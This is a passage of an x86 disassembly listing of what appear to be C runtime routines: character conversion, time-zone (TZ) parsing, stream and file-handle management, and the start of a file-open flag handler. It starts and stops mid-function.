loc_41DB5C: ; CODE XREF: sub_41D840+1B7�j
; sub_41D840:loc_41DA24�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41D840 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB75 proc near ; CODE XREF: sub_41A824+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_41DB98
cmp [ebp+arg_8], ebx
jz short loc_41DB98
mov al, [esi]
cmp al, bl
jnz short loc_41DB9E
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_41DB98
mov [eax], bx
loc_41DB98: ; CODE XREF: sub_41DB75+C�j
; sub_41DB75+11�j ...
xor eax, eax
loc_41DB9A: ; CODE XREF: sub_41DB75+42�j
; sub_41DB75+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41DB9E: ; CODE XREF: sub_41DB75+17�j
cmp dword_5158EC, ebx
jnz short loc_41DBB9
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_41DBB4
movzx ax, al
mov [ecx], ax
loc_41DBB4: ; CODE XREF: sub_41DB75+36�j
; sub_41DB75+C0�j
push 1
pop eax
jmp short loc_41DB9A
; ---------------------------------------------------------------------------
loc_41DBB9: ; CODE XREF: sub_41DB75+2F�j
mov ecx, off_43B5A0
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41DC16
mov eax, dword_43B7AC
cmp eax, 1
jle short loc_41DBFD
cmp [ebp+arg_8], eax
jl short loc_41DC07
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_5158FC
nop
call near ptr 7C809BF8h
test eax, eax
mov eax, dword_43B7AC
jnz short loc_41DB9A
loc_41DBFD: ; CODE XREF: sub_41DB75+5C�j
cmp [ebp+arg_8], eax
jb short loc_41DC07
cmp [esi+1], bl
jnz short loc_41DB9A
loc_41DC07: ; CODE XREF: sub_41DB75+61�j
; sub_41DB75+8B�j ...
mov dword_515884, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41DB9A
; ---------------------------------------------------------------------------
loc_41DC16: ; CODE XREF: sub_41DB75+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_5158FC
nop
call near ptr 7C809BF8h
test eax, eax
jnz loc_41DBB4
jmp short loc_41DC07
sub_41DB75 endp
; =============== S U B R O U T I N E =======================================
sub_41DC3D proc near ; CODE XREF: sub_41A824+76�p
; sub_41A824+88�p ...
arg_0 = dword ptr 4
cmp dword_43B7AC, 1
jle short loc_41DC54
push 8
push [esp+4+arg_0]
call sub_419B4D
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41DC54: ; CODE XREF: sub_41DC3D+7�j
mov eax, [esp+arg_0]
mov ecx, off_43B5A0
mov al, [ecx+eax*2]
and eax, 8
retn
sub_41DC3D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41DC70 proc near ; CODE XREF: sub_41A824+797�p
; sub_41A824+7E7�p
cmp cl, 40h
jnb short loc_41DC8A
cmp cl, 20h
jnb short loc_41DC80
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_41DC80: ; CODE XREF: sub_41DC70+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_41DC8A: ; CODE XREF: sub_41DC70+3�j
xor eax, eax
xor edx, edx
retn
sub_41DC70 endp
; =============== S U B R O U T I N E =======================================
sub_41DC8F proc near ; CODE XREF: sub_41B29A+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41DCDB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41DCAD
test al, 80h
jz short loc_41DCDB
test al, 2
jnz short loc_41DCDB
loc_41DCAD: ; CODE XREF: sub_41DC8F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41DCBA
push esi
call sub_41D568
pop ecx
loc_41DCBA: ; CODE XREF: sub_41DC8F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41DCCA
cmp dword ptr [esi+4], 0
jnz short loc_41DCDB
inc eax
mov [esi], eax
loc_41DCCA: ; CODE XREF: sub_41DC8F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_41DCE1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_41DCE7
inc eax
mov [esi], eax
loc_41DCDB: ; CODE XREF: sub_41DC8F+9�j
; sub_41DC8F+18�j ...
or eax, 0FFFFFFFFh
loc_41DCDE: ; CODE XREF: sub_41DC8F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41DCE1: ; CODE XREF: sub_41DC8F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_41DCE7: ; CODE XREF: sub_41DC8F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41DCDE
sub_41DC8F endp
; =============== S U B R O U T I N E =======================================
sub_41DCFD proc near ; CODE XREF: sub_41B2D5:loc_41B314�p
cmp dword_515AF8, 0
jnz short locret_41DD11
call sub_41DD12
inc dword_515AF8
locret_41DD11: ; CODE XREF: sub_41DCFD+7�j
retn
sub_41DCFD endp
; =============== S U B R O U T I N E =======================================
sub_41DD12 proc near ; CODE XREF: sub_41DCFD+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov dword_515A40, ebp
mov dword_43BEA8, ebx
mov dword_43BE98, ebx
call sub_41EFBB
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_41DE3B
push offset dword_515A48
nop
call near ptr 7C8350BFh
cmp eax, ebx
jz loc_41DF6A
mov eax, dword_515A48
mov ecx, dword_515A9C
imul eax, 3Ch
cmp word_515A8E, bp
push 1
pop edx
mov dword_43BE00, eax
mov dword_515A40, edx
jz short loc_41DD89
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_43BE00, eax
loc_41DD89: ; CODE XREF: sub_41DD12+69�j
cmp word_515AE2, bp
jz short loc_41DDAD
mov eax, dword_515AF0
cmp eax, ebp
jz short loc_41DDAD
sub eax, ecx
mov dword_43BE04, edx
imul eax, 3Ch
mov dword_43BE08, eax
jmp short loc_41DDB9
; ---------------------------------------------------------------------------
loc_41DDAD: ; CODE XREF: sub_41DD12+7E�j
; sub_41DD12+87�j
mov dword_43BE04, ebp
mov dword_43BE08, ebp
loc_41DDB9: ; CODE XREF: sub_41DD12+99�j
lea eax, [esp+14h+var_4]
mov esi, dword_421158
push eax
push ebp
push 3Fh
mov edi, 220h
push off_43BE8C
push ebx
push offset dword_515A4C
push edi
push dword_5158FC
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_41DDF6
cmp [esp+14h+var_4], ebp
jnz short loc_41DDF6
mov eax, off_43BE8C
and byte ptr [eax+3Fh], 0
jmp short loc_41DDFE
; ---------------------------------------------------------------------------
loc_41DDF6: ; CODE XREF: sub_41DD12+D1�j
; sub_41DD12+D7�j
mov eax, off_43BE8C
and byte ptr [eax], 0
loc_41DDFE: ; CODE XREF: sub_41DD12+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push off_43BE90
push ebx
push offset dword_515AA0
push edi
push dword_5158FC
call esi ; WideCharToMultiByte
test eax, eax
jz loc_41DF62
cmp [esp+14h+var_4], ebp
jnz loc_41DF62
mov eax, off_43BE90
and byte ptr [eax+3Fh], 0
jmp loc_41DF6A
; ---------------------------------------------------------------------------
loc_41DE3B: ; CODE XREF: sub_41DD12+2D�j
cmp byte ptr [esi], 0
jz loc_41DF6A
mov eax, dword_515AF4
cmp eax, ebp
jz short loc_41DE5E
push eax
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41DF6A
loc_41DE5E: ; CODE XREF: sub_41DD12+139�j
push dword_515AF4
call sub_417C62
push esi
call sub_417AF0
inc eax
push eax
call sub_417BEE
add esp, 0Ch
cmp eax, ebp
mov dword_515AF4, eax
jz loc_41DF6A
push esi
push eax
call sub_417A00
push 3
push esi
push off_43BE8C
call sub_4182F0
mov eax, off_43BE8C
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_41DEB3
push 1
inc esi
pop edi
loc_41DEB3: ; CODE XREF: sub_41DD12+19B�j
push esi
call sub_417894
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_43BE00, ecx
loc_41DECA: ; CODE XREF: sub_41DD12+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_41DED8
cmp al, bl
jl short loc_41DEDB
cmp al, 39h
jg short loc_41DEDB
loc_41DED8: ; CODE XREF: sub_41DD12+1BC�j
inc esi
jmp short loc_41DECA
; ---------------------------------------------------------------------------
loc_41DEDB: ; CODE XREF: sub_41DD12+1C0�j
; sub_41DD12+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_41DF2E
inc esi
push esi
call sub_417894
imul eax, 3Ch
pop ecx
mov ecx, dword_43BE00
add ecx, eax
mov dword_43BE00, ecx
loc_41DEF9: ; CODE XREF: sub_41DD12+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_41DF06
cmp al, 39h
jg short loc_41DF06
inc esi
jmp short loc_41DEF9
; ---------------------------------------------------------------------------
loc_41DF06: ; CODE XREF: sub_41DD12+1EB�j
; sub_41DD12+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_41DF2E
inc esi
push esi
call sub_417894
pop ecx
mov ecx, dword_43BE00
add ecx, eax
mov dword_43BE00, ecx
loc_41DF21: ; CODE XREF: sub_41DD12+21A�j
mov al, [esi]
cmp al, bl
jl short loc_41DF2E
cmp al, 39h
jg short loc_41DF2E
inc esi
jmp short loc_41DF21
; ---------------------------------------------------------------------------
loc_41DF2E: ; CODE XREF: sub_41DD12+1CC�j
; sub_41DD12+1F7�j ...
cmp edi, ebp
jz short loc_41DF3A
neg ecx
mov dword_43BE00, ecx
loc_41DF3A: ; CODE XREF: sub_41DD12+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword_43BE04, eax
jz short loc_41DF62
push 3
push esi
push off_43BE90
call sub_4182F0
mov eax, off_43BE90
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_41DF6A
; ---------------------------------------------------------------------------
loc_41DF62: ; CODE XREF: sub_41DD12+10B�j
; sub_41DD12+115�j ...
mov eax, off_43BE90
and byte ptr [eax], 0
loc_41DF6A: ; CODE XREF: sub_41DD12+40�j
; sub_41DD12+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_41DD12 endp
; =============== S U B R O U T I N E =======================================
sub_41DF70 proc near ; CODE XREF: sub_41B2D5+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_43BE04, edi
jnz short loc_41DF84
loc_41DF7D: ; CODE XREF: sub_41DF70+148�j
; sub_41DF70+150�j ...
xor eax, eax
jmp loc_41E0D0
; ---------------------------------------------------------------------------
loc_41DF84: ; CODE XREF: sub_41DF70+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_43BE98
jnz short loc_41DFA2
cmp eax, dword_43BEA8
jz loc_41E0A4
loc_41DFA2: ; CODE XREF: sub_41DF70+24�j
cmp dword_515A40, edi
jz loc_41E07A
movzx ecx, word_515AEE
push ecx
cmp word_515AE0, di
movzx ecx, word_515AEC
push ecx
movzx ecx, word_515AEA
push ecx
movzx ecx, word_515AE8
push ecx
jnz short loc_41DFF4
movzx ecx, word_515AE4
push edi
push ecx
movzx ecx, word_515AE6
push ecx
movzx ecx, word_515AE2
push ecx
push eax
push ebx
jmp short loc_41E008
; ---------------------------------------------------------------------------
loc_41DFF4: ; CODE XREF: sub_41DF70+65�j
movzx ecx, word_515AE6
push ecx
push edi
movzx ecx, word_515AE2
push edi
push ecx
push eax
push edi
loc_41E008: ; CODE XREF: sub_41DF70+82�j
push ebx
call sub_41E11C
movzx eax, word_515A9A
add esp, 2Ch
cmp word_515A8C, di
push eax
movzx eax, word_515A98
push eax
movzx eax, word_515A96
push eax
movzx eax, word_515A94
push eax
jnz short loc_41E062
movzx eax, word_515A90
push edi
push eax
movzx eax, word_515A92
push eax
movzx eax, word_515A8E
push eax
push dword ptr [esi+14h]
push ebx
loc_41E057: ; CODE XREF: sub_41DF70+108�j
push edi
call sub_41E11C
add esp, 2Ch
jmp short loc_41E0A4
; ---------------------------------------------------------------------------
loc_41E062: ; CODE XREF: sub_41DF70+C8�j
movzx eax, word_515A92
push eax
push edi
movzx eax, word_515A8E
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_41E057
; ---------------------------------------------------------------------------
loc_41E07A: ; CODE XREF: sub_41DF70+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_41E11C
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_41E11C
add esp, 58h
loc_41E0A4: ; CODE XREF: sub_41DF70+2C�j
; sub_41DF70+F0�j
mov edx, dword_43BE9C
mov eax, dword_43BEAC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_41E0D4
cmp ecx, edx
jl loc_41DF7D
cmp ecx, eax
jg loc_41DF7D
cmp ecx, edx
jle short loc_41E0E8
cmp ecx, eax
jge short loc_41E0E8
loc_41E0CE: ; CODE XREF: sub_41DF70+166�j
; sub_41DF70+16A�j
mov eax, ebx
loc_41E0D0: ; CODE XREF: sub_41DF70+F�j
; sub_41DF70+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41E0D4: ; CODE XREF: sub_41DF70+144�j
cmp ecx, eax
jl short loc_41E0CE
cmp ecx, edx
jg short loc_41E0CE
cmp ecx, eax
jle short loc_41E0E8
cmp ecx, edx
jl loc_41DF7D
loc_41E0E8: ; CODE XREF: sub_41DF70+158�j
; sub_41DF70+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_41E10F
xor ecx, ecx
cmp eax, dword_43BEA0
setnl cl
loc_41E10B: ; CODE XREF: sub_41DF70+1AA�j
mov eax, ecx
jmp short loc_41E0D0
; ---------------------------------------------------------------------------
loc_41E10F: ; CODE XREF: sub_41DF70+18E�j
xor ecx, ecx
cmp eax, dword_43BEB0
setl cl
jmp short loc_41E10B
sub_41DF70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E11C proc near ; CODE XREF: sub_41DF70+99�p
; sub_41DF70+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_41E1B7
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_41E147
shl esi, 2
mov eax, dword_43BEB0[esi]
jmp short loc_41E150
; ---------------------------------------------------------------------------
loc_41E147: ; CODE XREF: sub_41E11C+1E�j
shl esi, 2
mov eax, dword_43BEE4[esi]
loc_41E150: ; CODE XREF: sub_41E11C+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jge short loc_41E18A
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_41E194
; ---------------------------------------------------------------------------
loc_41E18A: ; CODE XREF: sub_41E11C+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_41E194: ; CODE XREF: sub_41E11C+6C�j
cmp [ebp+arg_10], 5
jnz short loc_41E1D2
cmp [ebp+arg_8], 0
jnz short loc_41E1A8
mov esi, dword_43BEB4[esi]
jmp short loc_41E1AE
; ---------------------------------------------------------------------------
loc_41E1A8: ; CODE XREF: sub_41E11C+82�j
mov esi, dword_43BEE8[esi]
loc_41E1AE: ; CODE XREF: sub_41E11C+8A�j
cmp ecx, esi
jle short loc_41E1D2
sub ecx, 7
jmp short loc_41E1D2
; ---------------------------------------------------------------------------
loc_41E1B7: ; CODE XREF: sub_41E11C+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_41E1C8
mov ecx, dword_43BEB0[eax*4]
jmp short loc_41E1CF
; ---------------------------------------------------------------------------
loc_41E1C8: ; CODE XREF: sub_41E11C+A1�j
mov ecx, dword_43BEE4[eax*4]
loc_41E1CF: ; CODE XREF: sub_41E11C+AA�j
add ecx, [ebp+arg_18]
loc_41E1D2: ; CODE XREF: sub_41E11C+7C�j
; sub_41E11C+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_41E203
mov eax, [ebp+arg_1C]
mov dword_43BE9C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_43BE98, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_43BEA0, eax
jmp short loc_41E258
; ---------------------------------------------------------------------------
loc_41E203: ; CODE XREF: sub_41E11C+BA�j
mov eax, [ebp+arg_1C]
mov dword_43BEAC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_43BE08
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_43BEB0, eax
jns short loc_41E23B
add eax, 5265C00h
dec ecx
mov dword_43BEB0, eax
jmp short loc_41E24C
; ---------------------------------------------------------------------------
loc_41E23B: ; CODE XREF: sub_41E11C+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_41E252
sub eax, edx
inc ecx
mov dword_43BEB0, eax
loc_41E24C: ; CODE XREF: sub_41E11C+11D�j
mov dword_43BEAC, ecx
loc_41E252: ; CODE XREF: sub_41E11C+126�j
mov dword_43BEA8, ebx
loc_41E258: ; CODE XREF: sub_41E11C+E5�j
pop esi
pop ebx
pop ebp
retn
sub_41E11C endp
; =============== S U B R O U T I N E =======================================
sub_41E25C proc near ; CODE XREF: sub_41E476:loc_41E5EE�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_516B80
loc_41E26B: ; CODE XREF: sub_41E25C+48�j
mov eax, [ecx]
test eax, eax
jz short loc_41E2A8
lea edx, [eax+100h]
loc_41E277: ; CODE XREF: sub_41E25C+28�j
cmp eax, edx
jnb short loc_41E297
test byte ptr [eax+4], 1
jz short loc_41E286
add eax, 8
jmp short loc_41E277
; ---------------------------------------------------------------------------
loc_41E286: ; CODE XREF: sub_41E25C+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41E2EB
loc_41E297: ; CODE XREF: sub_41E25C+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_516C80
jl short loc_41E26B
jmp short loc_41E2EB
; ---------------------------------------------------------------------------
loc_41E2A8: ; CODE XREF: sub_41E25C+13�j
mov esi, 100h
push esi
call sub_417BEE
test eax, eax
pop ecx
jz short loc_41E2EB
add dword_516C80, 20h
lea ecx, ds:516B80h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41E2CE: ; CODE XREF: sub_41E25C+88�j
cmp eax, edx
jnb short loc_41E2E6
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41E2CE
; ---------------------------------------------------------------------------
loc_41E2E6: ; CODE XREF: sub_41E25C+74�j
shl edi, 5
mov ebx, edi
loc_41E2EB: ; CODE XREF: sub_41E25C+39�j
; sub_41E25C+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41E25C endp
; =============== S U B R O U T I N E =======================================
sub_41E2F1 proc near ; CODE XREF: sub_41E476+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_516C80
push edi
jnb short loc_41E351
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:516B80h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_41E351
cmp dword_43B594, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41E347
sub eax, 0
jz short loc_41E33E
dec eax
jz short loc_41E339
dec eax
jnz short loc_41E347
push ebx
push 0FFFFFFF4h
jmp short loc_41E341
; ---------------------------------------------------------------------------
loc_41E339: ; CODE XREF: sub_41E2F1+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_41E341
; ---------------------------------------------------------------------------
loc_41E33E: ; CODE XREF: sub_41E2F1+3B�j
push ebx
push 0FFFFFFF6h
loc_41E341: ; CODE XREF: sub_41E2F1+46�j
; sub_41E2F1+4B�j
nop
call near ptr 7C81DC03h
loc_41E347: ; CODE XREF: sub_41E2F1+36�j
; sub_41E2F1+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_41E365
; ---------------------------------------------------------------------------
loc_41E351: ; CODE XREF: sub_41E2F1+C�j
; sub_41E2F1+28�j
and dword_515888, 0
mov dword_515884, 9
or eax, 0FFFFFFFFh
loc_41E365: ; CODE XREF: sub_41E2F1+5E�j
pop edi
pop esi
retn
sub_41E2F1 endp
; =============== S U B R O U T I N E =======================================
sub_41E368 proc near ; CODE XREF: sub_41B397+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_516C80
push edi
jnb short loc_41E3CB
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:516B80h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41E3CB
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41E3CB
cmp dword_43B594, 1
jnz short loc_41E3C1
xor eax, eax
sub ecx, eax
jz short loc_41E3B8
dec ecx
jz short loc_41E3B3
dec ecx
jnz short loc_41E3C1
push eax
push 0FFFFFFF4h
jmp short loc_41E3BB
; ---------------------------------------------------------------------------
loc_41E3B3: ; CODE XREF: sub_41E368+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41E3BB
; ---------------------------------------------------------------------------
loc_41E3B8: ; CODE XREF: sub_41E368+3E�j
push eax
push 0FFFFFFF6h
loc_41E3BB: ; CODE XREF: sub_41E368+49�j
; sub_41E368+4E�j
nop
call near ptr 7C81DC03h
loc_41E3C1: ; CODE XREF: sub_41E368+38�j
; sub_41E368+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_41E3DF
; ---------------------------------------------------------------------------
loc_41E3CB: ; CODE XREF: sub_41E368+C�j
; sub_41E368+2A�j ...
and dword_515888, 0
mov dword_515884, 9
or eax, 0FFFFFFFFh
loc_41E3DF: ; CODE XREF: sub_41E368+61�j
pop edi
pop esi
retn
sub_41E368 endp
; =============== S U B R O U T I N E =======================================
sub_41E3E2 proc near ; CODE XREF: sub_41B397+32�p
; sub_41B397+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_516C80
jnb short loc_41E40A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_516B80[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41E40A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41E40A: ; CODE XREF: sub_41E3E2+A�j
; sub_41E3E2+23�j
and dword_515888, 0
mov dword_515884, 9
or eax, 0FFFFFFFFh
retn
sub_41E3E2 endp
; =============== S U B R O U T I N E =======================================
sub_41E41F proc near ; CODE XREF: sub_41B475+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_516C80
jnb short loc_41E468
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword_516B80[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_41E468
push eax
call sub_41E3E2
pop ecx
push eax
nop
call near ptr 7C812641h
test eax, eax
jnz short loc_41E45D
nop
call near ptr 7C910331h
jmp short loc_41E45F
; ---------------------------------------------------------------------------
loc_41E45D: ; CODE XREF: sub_41E41F+34�j
xor eax, eax
loc_41E45F: ; CODE XREF: sub_41E41F+3C�j
test eax, eax
jz short locret_41E475
mov dword_515888, eax
loc_41E468: ; CODE XREF: sub_41E41F+A�j
; sub_41E41F+22�j
mov dword_515884, 9
or eax, 0FFFFFFFFh
locret_41E475: ; CODE XREF: sub_41E41F+42�j
retn
sub_41E41F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E476 proc near ; CODE XREF: sub_41B851+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41E49C
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_41E4A7
; ---------------------------------------------------------------------------
loc_41E49C: ; CODE XREF: sub_41E476+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41E4A7: ; CODE XREF: sub_41E476+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_41E4C1
test ch, 40h
jnz short loc_41E4BD
cmp dword_515B3C, eax
jz short loc_41E4C1
loc_41E4BD: ; CODE XREF: sub_41E476+3D�j
or [ebp+var_1], 80h
loc_41E4C1: ; CODE XREF: sub_41E476+38�j
; sub_41E476+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_41E4F9
dec eax
jz short loc_41E4F0
dec eax
jz short loc_41E4E7
loc_41E4D2: ; CODE XREF: sub_41E476+9F�j
; sub_41E476+E8�j ...
mov dword_515884, 16h
mov dword_515888, ebx
jmp loc_41E70C
; ---------------------------------------------------------------------------
loc_41E4E7: ; CODE XREF: sub_41E476+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_41E500
; ---------------------------------------------------------------------------
loc_41E4F0: ; CODE XREF: sub_41E476+57�j
mov [ebp+var_C], 40000000h
jmp short loc_41E500
; ---------------------------------------------------------------------------
loc_41E4F9: ; CODE XREF: sub_41E476+54�j
mov [ebp+var_C], 80000000h
loc_41E500: ; CODE XREF: sub_41E476+78�j
; sub_41E476+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41E52E
cmp eax, 20h
jz short loc_41E525
cmp eax, 30h
jz short loc_41E51C
cmp eax, 40h
jnz short loc_41E4D2
mov [ebp+var_10], esi
jmp short loc_41E531
; ---------------------------------------------------------------------------
loc_41E51C: ; CODE XREF: sub_41E476+9A�j
mov [ebp+var_10], 2
jmp short loc_41E531
; ---------------------------------------------------------------------------
loc_41E525: ; CODE XREF: sub_41E476+95�j
mov [ebp+var_10], 1
jmp short loc_41E531
; ---------------------------------------------------------------------------
loc_41E52E: ; CODE XREF: sub_41E476+90�j
mov [ebp+var_10], ebx
loc_41E531: ; CODE XREF: sub_41E476+A4�j
; sub_41E476+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_41E57B
jz short loc_41E576
cmp ecx, ebx
jz short loc_41E576
cmp ecx, edi
jz short loc_41E56D
cmp ecx, 200h
jz short loc_41E594
cmp ecx, 300h
jnz loc_41E4D2
mov [ebp+var_8], 2
jmp short loc_41E5A4
; ---------------------------------------------------------------------------
loc_41E56D: ; CODE XREF: sub_41E476+D8�j
mov [ebp+var_8], 4
jmp short loc_41E5A4
; ---------------------------------------------------------------------------
loc_41E576: ; CODE XREF: sub_41E476+D0�j
; sub_41E476+D4�j
mov [ebp+var_8], esi
jmp short loc_41E5A4
; ---------------------------------------------------------------------------
loc_41E57B: ; CODE XREF: sub_41E476+CE�j
cmp ecx, 500h
jz short loc_41E59D
cmp ecx, 600h
jz short loc_41E594
cmp ecx, edx
jz short loc_41E59D
